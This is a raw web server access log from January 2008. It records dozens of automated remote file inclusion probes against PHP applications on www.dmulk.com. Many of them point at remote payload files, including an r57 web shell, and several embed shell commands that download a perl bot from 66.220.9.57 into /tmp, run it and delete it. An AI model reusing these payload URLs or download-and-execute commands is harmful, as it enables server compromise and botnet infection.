207.181.4.175 - - [16/Jan/2008:10:44:10 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:10:44:11 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:10:44:11 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:10:44:11 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:10:44:11 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.77.52 - - [16/Jan/2008:10:44:25 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
216.246.77.52 - - [16/Jan/2008:10:44:25 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:10:44:28 -0800] "GET /logs/access_071229.log/bbs//skin/zero_vote/ask_password.php?dir=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:10:44:28 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:10:44:28 -0800] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.87.230.170 - - [16/Jan/2008:10:45:41 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.230.170 - - [16/Jan/2008:10:45:52 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.230.170 - - [16/Jan/2008:10:46:02 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:10:46:25 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:10:46:30 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:10:46:35 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:10:46:46 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.208.82 - - [16/Jan/2008:10:48:27 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.208.82 - - [16/Jan/2008:10:48:28 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.208.82 - - [16/Jan/2008:10:48:29 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.210.38.36 - - [16/Jan/2008:10:50:20 -0800] "GET /funny/ HTTP/1.1" 200 808 "http://www.google.com/search?q=index+of+/funny&hl=en&start=20&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2" "www.dmulk.com"
89.210.38.36 - - [16/Jan/2008:10:50:21 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2" "www.dmulk.com"
89.210.38.36 - - [16/Jan/2008:10:50:24 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2" "www.dmulk.com"
87.25.213.172 - - [16/Jan/2008:10:50:59 -0800] "GET /logs/access_071228.log/skin/zero_vote/error.php?dir=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [16/Jan/2008:10:50:59 -0800] "GET /skin/zero_vote/error.php?dir=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [16/Jan/2008:10:51:00 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [16/Jan/2008:10:51:51 -0800] "GET /skin/zero_vote/error.php?dir=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.208.82 - - [16/Jan/2008:10:52:09 -0800] "GET /logs/access_071225.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [16/Jan/2008:10:52:29 -0800] "GET /logs/access.log/skin/zero_vote/error.php?dir=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.161.218 - - [16/Jan/2008:10:54:49 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/KOMA? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.180.216.12 - - [16/Jan/2008:10:54:50 -0800] "GET /logs/access_071221.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [16/Jan/2008:10:54:56 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [16/Jan/2008:10:55:03 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.18.163 - - [16/Jan/2008:10:55:47 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://berlinbalboa.de//images/img/contr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.18.163 - - [16/Jan/2008:10:55:48 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://berlinbalboa.de//images/img/contr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
122.152.129.53 - - [16/Jan/2008:10:56:54 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.dmulk.com"
74.6.28.154 - - [16/Jan/2008:10:59:11 -0800] "GET /logs/access_070911.log HTTP/1.0" 200 86699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.208.33.251 - - [16/Jan/2008:11:00:42 -0800] "GET /logs/access_071229.log//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.33.251 - - [16/Jan/2008:11:00:42 -0800] "GET /logs//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:11:01:28 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:11:01:28 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
75.125.161.218 - - [16/Jan/2008:11:01:59 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/KOMA? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [16/Jan/2008:11:01:59 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/KOMA? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:11:02:00 -0800] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:11:02:00 -0800] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
209.62.26.18 - - [16/Jan/2008:11:04:57 -0800] "GET /logs/access_071229.log//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [16/Jan/2008:11:04:59 -0800] "GET /logs//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.167.95 - - [16/Jan/2008:11:07:33 -0800] "GET /logs/access_071229.log//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.167.95 - - [16/Jan/2008:11:07:33 -0800] "GET /logs//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:11:07:48 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:11:07:48 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:11:07:48 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:03 -0800] "GET //include.php?path[docroot]=http://www.red.info.pl/pub/shelle/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:04 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;GET+http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+xbot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:04 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;wget+http://66.220.9.57/web/hyp3r/x.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:04 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;fetch%20http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:04 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;curl+http://66.220.9.57/web/hyp3r/x.txt+-o+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:04 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;lynx+-source+http://66.220.9.57/web/hyp3r/x.txt+%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:04 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:22 -0800] "GET //include.php?path[docroot]=http://www.red.info.pl/pub/shelle/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:23 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;GET+http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+xbot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:23 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;wget+http://66.220.9.57/web/hyp3r/x.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:23 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;fetch%20http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:23 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;curl+http://66.220.9.57/web/hyp3r/x.txt+-o+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:23 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;lynx+-source+http://66.220.9.57/web/hyp3r/x.txt+%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:24 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:26 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;wget+http://66.220.9.57/web/hyp3r/x.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:26 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;fetch%20http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:27 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;curl+http://66.220.9.57/web/hyp3r/x.txt+-o+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:27 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;lynx+-source+http://66.220.9.57/web/hyp3r/x.txt+%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:11:08:27 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:11:08:37 -0800] "GET /logs/access_071228.log/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [16/Jan/2008:11:08:38 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:11:10:58 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.57.128.49 - - [16/Jan/2008:11:12:07 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [16/Jan/2008:11:12:12 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [16/Jan/2008:11:12:18 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.2.204.171 - - [16/Jan/2008:11:13:50 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.2.204.171 - - [16/Jan/2008:11:13:50 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.2.204.171 - - [16/Jan/2008:11:13:50 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.2.204.171 - - [16/Jan/2008:11:13:55 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.2.204.171 - - [16/Jan/2008:11:13:55 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.2.204.171 - - [16/Jan/2008:11:13:56 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [16/Jan/2008:11:19:26 -0800] "GET /logs/access_071225.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [16/Jan/2008:11:20:58 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:21:00 -0800] "GET /logs/access_071229.log/conteudo//components/com_simpleboard/image_upload.php?sbp=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:21:00 -0800] "GET /conteudo//components/com_simpleboard/image_upload.php?sbp=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:21:00 -0800] "GET /logs/conteudo//components/com_simpleboard/image_upload.php?sbp=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.54.19 - - [16/Jan/2008:11:25:18 -0800] "GET /logs/access_071230.log/index1.php?choix=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [16/Jan/2008:11:25:18 -0800] "GET /index1.php?choix=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [16/Jan/2008:11:25:18 -0800] "GET /logs/index1.php?choix=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:27:17 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:27:17 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:27:17 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.105.83.200 - - [16/Jan/2008:11:27:24 -0800] "GET //include.php?path[docroot]=http://www.red.info.pl/pub/shelle/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.105.83.200 - - [16/Jan/2008:11:27:24 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;GET+http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+xbot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.105.83.200 - - [16/Jan/2008:11:27:24 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;wget+http://66.220.9.57/web/hyp3r/x.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.105.83.200 - - [16/Jan/2008:11:27:24 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;fetch%20http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.105.83.200 - - [16/Jan/2008:11:27:24 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;curl+http://66.220.9.57/web/hyp3r/x.txt+-o+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.105.83.200 - - [16/Jan/2008:11:27:24 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;lynx+-source+http://66.220.9.57/web/hyp3r/x.txt+%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.105.83.200 - - [16/Jan/2008:11:27:25 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:11:27:30 -0800] "GET /logs/access_071205.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:11:28:00 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:11:31:08 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:11:31:08 -0800] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:11:32:30 -0800] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
